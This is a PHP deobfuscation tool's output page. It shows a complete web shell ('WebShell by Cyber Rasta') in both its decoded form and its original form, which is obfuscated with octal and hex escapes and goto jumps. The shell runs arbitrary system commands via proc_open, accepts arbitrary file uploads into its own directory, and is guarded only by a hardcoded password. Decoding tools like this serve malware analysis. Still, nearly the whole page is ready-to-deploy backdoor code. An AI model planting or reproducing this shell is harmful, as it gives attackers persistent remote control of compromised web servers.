Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto f1TW6; JWlu4: if (isset($_POST["\141\x63\x74\151\157\156"]) && $_POST["\141\1..

Decoded Output download

<?php 
 goto f1TW6; JWlu4: if (isset($_POST["action"]) && $_POST["action"] === "clear") { echo "<script>document.getElementById('output').innerHTML = '';</script>"; die; } goto XYOds; f1TW6: $password = "12345678"; goto KGV3J; KGV3J: session_start(); goto qttal; wA4gC: if (isset($_FILES["file"])) { $uploadDirectory = __DIR__ . "/"; if (!is_dir($uploadDirectory)) { mkdir($uploadDirectory, 511, true); } $uploadFile = $uploadDirectory . basename($_FILES["file"]["name"]); if (move_uploaded_file($_FILES["file"]["tmp_name"], $uploadFile)) { echo "<pre>Upload realizado com sucesso " . htmlspecialchars($uploadFile) . "</pre>"; } else { echo "<pre>Falha ao realizar o upload</pre>"; } die; } goto JWlu4; AEToF: function executeCommand($command) { $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($command, $descriptorspec, $pipes, realpath("./"), array()); if (is_resource($process)) { $output = ''; while ($s = fgets($pipes[1])) { $output .= htmlspecialchars($s); } fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); return $output; } return ''; } goto uc5R6; qttal: if (!isset($_SESSION["authenticated"])) { if (isset($_POST["password"]) && $_POST["password"] === $password) { $_SESSION["authenticated"] = true; } else { echo "<form method="POST"><input type="password" name="password"/><input type="submit" value="Login"/></form>"; die; } } goto AEToF; uc5R6: if (isset($_POST["command"])) { echo "<pre><span style='color: cyan;'>" . htmlspecialchars($_POST["command"]) . "</span>
" . executeCommand($_POST["command"]) . "</pre>"; die; } goto wA4gC; XYOds: ?> 
<!doctypehtml><html><head><title>WebShell by Cyber Rasta</title><style>body{background-color:#3f3f3f;color:#0f0;font-family:monospace}form{margin:0}input[type=file],input[type=text]{background-color:#3f3f3f;color:#0f0;border:none;width:90%;font-size:1.2em;padding:10px;margin:10px 0}input[type=submit]{background-color:#3f3f3f;color:#0f0;border:none;font-size:1.2em;padding:10px;margin:10px 0;cursor:pointer}#output{margin:10px 0;padding:10px;background-color:#3f3f3f;overflow-y:auto;max-height:500px}</style></head><body><h1>Web Shell by Cyber Rasta</h1><div id="output"></div><form id="commandForm"method="POST"><input name="command"id="commandInput"placeholder="Enter command"autofocus autocomplete="off"> <input type="submit"value="Executar"></form><form id="clearForm"method="POST"><input type="hidden"value="clear"name="action"> <input type="submit"value="Limpar"></form><form id="uploadForm"method="POST"enctype="multipart/form-data"><input type="file"name="file"id="fileInput"> <input type="submit"value="Upload"></form><script>document.getElementById("commandForm").onsubmit=function(){var t=new XMLHttpRequest;t.open("POST","",!0),t.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),t.onreadystatechange=function(){if(4===t.readyState&&200===t.status){var e=document.getElementById("output");document.getElementById("commandInput").value;e.innerHTML+=t.responseText,e.scrollTop=e.scrollHeight,document.getElementById("commandInput").value=""}};var e=document.getElementById("commandInput").value;return t.send("command="+encodeURIComponent(e)),!1},document.getElementById("clearForm").onsubmit=function(){var e=new XMLHttpRequest;return e.open("POST","",!0),e.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),e.onreadystatechange=function(){4===e.readyState&&200===e.status&&(document.getElementById("output").innerHTML="")},e.send("action=clear"),!1},document.getElementById("uploadForm").onsubmit=function(){var e=new FormData(document.getElementById("uploadForm")),t=new XMLHttpRequest;return t.open("POST","",!0),t.onreadystatechange=function(){if(4===t.readyState&&200===t.status){var e=document.getElementById("output");e.innerHTML+=t.responseText,e.scrollTop=e.scrollHeight,document.getElementById("fileInput").value=""}},t.send(e),!1}</script></body></html>

Did this file decode correctly?

Original Code

<?php
 goto f1TW6; JWlu4: if (isset($_POST["\141\x63\x74\151\157\156"]) && $_POST["\141\143\164\x69\x6f\156"] === "\143\x6c\145\141\x72") { echo "\74\x73\143\x72\x69\x70\x74\x3e\x64\x6f\143\x75\x6d\x65\x6e\x74\56\x67\145\x74\105\154\x65\x6d\145\x6e\164\x42\171\111\x64\50\x27\157\165\x74\160\x75\164\47\51\x2e\x69\156\156\x65\162\x48\x54\115\114\x20\x3d\x20\x27\x27\x3b\x3c\x2f\163\143\x72\151\160\x74\76"; die; } goto XYOds; f1TW6: $password = "\x31\62\x33\64\x35\66\67\x38"; goto KGV3J; KGV3J: session_start(); goto qttal; wA4gC: if (isset($_FILES["\146\x69\154\145"])) { $uploadDirectory = __DIR__ . "\57"; if (!is_dir($uploadDirectory)) { mkdir($uploadDirectory, 511, true); } $uploadFile = $uploadDirectory . basename($_FILES["\x66\151\x6c\x65"]["\x6e\141\155\x65"]); if (move_uploaded_file($_FILES["\x66\151\154\145"]["\x74\155\160\x5f\156\141\x6d\145"], $uploadFile)) { echo "\x3c\160\x72\x65\x3e\125\x70\154\x6f\x61\144\x20\162\x65\141\x6c\151\172\141\144\157\40\x63\157\155\40\x73\165\143\x65\163\163\157\x20" . htmlspecialchars($uploadFile) . "\74\x2f\x70\162\145\76"; } else { echo "\x3c\160\x72\x65\76\x46\141\x6c\150\x61\40\x61\x6f\40\162\145\x61\x6c\x69\x7a\141\x72\x20\157\40\165\160\x6c\157\141\x64\x3c\x2f\x70\162\145\76"; } die; } goto JWlu4; AEToF: function executeCommand($command) { $descriptorspec = array(0 => array("\x70\151\160\145", "\162"), 1 => array("\160\151\160\x65", "\167"), 2 => array("\160\x69\x70\145", "\x77")); $process = proc_open($command, $descriptorspec, $pipes, realpath("\56\57"), array()); if (is_resource($process)) { $output = ''; while ($s = fgets($pipes[1])) { $output .= htmlspecialchars($s); } fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); return $output; } return ''; } goto uc5R6; qttal: if (!isset($_SESSION["\141\165\164\150\x65\x6e\x74\151\143\141\164\145\x64"])) { if (isset($_POST["\x70\141\163\x73\167\x6f\x72\x64"]) && $_POST["\x70\141\163\163\167\x6f\162\x64"] === $password) { $_SESSION["\x61\165\x74\x68\145\x6e\x74\151\x63\x61\164\145\144"] = true; } else { echo "\74\x66\x6f\x72\155\40\x6d\145\x74\x68\157\x64\x3d\x22\x50\117\123\x54\x22\76\x3c\x69\156\x70\165\x74\x20\164\x79\160\145\75\x22\x70\141\x73\x73\167\x6f\162\x64\42\40\x6e\141\155\x65\x3d\42\160\x61\163\x73\x77\x6f\162\x64\x22\x2f\76\74\x69\x6e\x70\x75\x74\x20\x74\x79\160\x65\x3d\x22\x73\x75\x62\x6d\151\164\42\x20\x76\141\x6c\x75\145\75\42\x4c\x6f\147\x69\x6e\42\x2f\76\74\57\146\157\162\x6d\x3e"; die; } } goto AEToF; uc5R6: if (isset($_POST["\143\x6f\x6d\155\141\156\144"])) { echo "\x3c\160\162\145\x3e\74\x73\160\x61\x6e\x20\163\164\x79\x6c\145\x3d\x27\x63\157\154\157\162\x3a\40\x63\171\x61\x6e\x3b\47\x3e" . htmlspecialchars($_POST["\143\157\x6d\x6d\141\x6e\144"]) . "\x3c\57\x73\x70\x61\156\x3e\12" . executeCommand($_POST["\x63\157\155\x6d\141\156\144"]) . "\x3c\57\160\162\145\76"; die; } goto wA4gC; XYOds: ?>
<!doctypehtml><html><head><title>WebShell by Cyber Rasta</title><style>body{background-color:#3f3f3f;color:#0f0;font-family:monospace}form{margin:0}input[type=file],input[type=text]{background-color:#3f3f3f;color:#0f0;border:none;width:90%;font-size:1.2em;padding:10px;margin:10px 0}input[type=submit]{background-color:#3f3f3f;color:#0f0;border:none;font-size:1.2em;padding:10px;margin:10px 0;cursor:pointer}#output{margin:10px 0;padding:10px;background-color:#3f3f3f;overflow-y:auto;max-height:500px}</style></head><body><h1>Web Shell by Cyber Rasta</h1><div id="output"></div><form id="commandForm"method="POST"><input name="command"id="commandInput"placeholder="Enter command"autofocus autocomplete="off"> <input type="submit"value="Executar"></form><form id="clearForm"method="POST"><input type="hidden"value="clear"name="action"> <input type="submit"value="Limpar"></form><form id="uploadForm"method="POST"enctype="multipart/form-data"><input type="file"name="file"id="fileInput"> <input type="submit"value="Upload"></form><script>document.getElementById("commandForm").onsubmit=function(){var t=new XMLHttpRequest;t.open("POST","",!0),t.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),t.onreadystatechange=function(){if(4===t.readyState&&200===t.status){var e=document.getElementById("output");document.getElementById("commandInput").value;e.innerHTML+=t.responseText,e.scrollTop=e.scrollHeight,document.getElementById("commandInput").value=""}};var e=document.getElementById("commandInput").value;return t.send("command="+encodeURIComponent(e)),!1},document.getElementById("clearForm").onsubmit=function(){var e=new XMLHttpRequest;return e.open("POST","",!0),e.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),e.onreadystatechange=function(){4===e.readyState&&200===e.status&&(document.getElementById("output").innerHTML="")},e.send("action=clear"),!1},document.getElementById("uploadForm").onsubmit=function(){var e=new FormData(document.getElementById("uploadForm")),t=new XMLHttpRequest;return t.open("POST","",!0),t.onreadystatechange=function(){if(4===t.readyState&&200===t.status){var e=document.getElementById("output");e.innerHTML+=t.responseText,e.scrollTop=e.scrollHeight,document.getElementById("fileInput").value=""}},t.send(e),!1}</script></body></html>

Function Calls

None

Variables

None

Stats

MD5 dcc3311354ce2b270f6c61b2edc85861
Eval Count 0
Decode Time 68 ms